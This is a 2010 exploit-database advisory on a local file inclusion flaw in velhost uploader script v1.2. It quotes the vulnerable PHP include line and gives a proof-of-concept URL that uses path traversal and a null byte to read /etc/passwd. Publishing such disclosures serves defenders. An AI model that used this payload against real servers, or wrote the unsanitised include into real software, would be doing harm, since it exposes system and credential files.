Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23509
HistoryApr 05, 2010 - 12:00 a.m.

velhost uploader script v1.2 Local File Inclusion Vulnerability

2010-04-0500:00:00
vulners.com
14

===============================================================
velhost uploader script v1.2 Local File Inclusion Vulnerability

[+] velhost uploader script v1.2 Local File Inclusion Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'`\ /\ \ /'`\ 0
0 /\, \ ___ /\\/\\ \ \ \ \ ,\/\ \/\ \ _ ___ 1
1 \/
/\ \ /' _ `\ \/\ \/
/
\< /'
\ \ \/\ \ \ \ \/\`'\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \
/\ \ \\ \ \\ \ \ \/ 1
1 \ \\ \\ \\\ \ \ \/\ \\\ \
\\ \/\ \\ 0
0 \/
/\/
/\/
/\ \\ \/
/ \// \// \// \// 1
1 \ \
/ >> Exploit database separated by exploit 0
0 \/
/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ###################################### 1
0 I'm cr4wl3r member from Inj3ct0r Team 1
1 ###################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered by: cr4wl3r
[+] Advisories: http://shell4u.oni.cc/home/exploits/velhost.txt
[+] Download : http://www.nulledscriptz.com/showthread.php?5418-velhost-uploader-script-v1-2
[+] Code [upload.php]

include("./lang/$language.php");

[+] PoC: [path]/pages/upload.php?language=…/…/…/…/…/etc/passwd%00

Inj3ct0r.com [2010-04-02]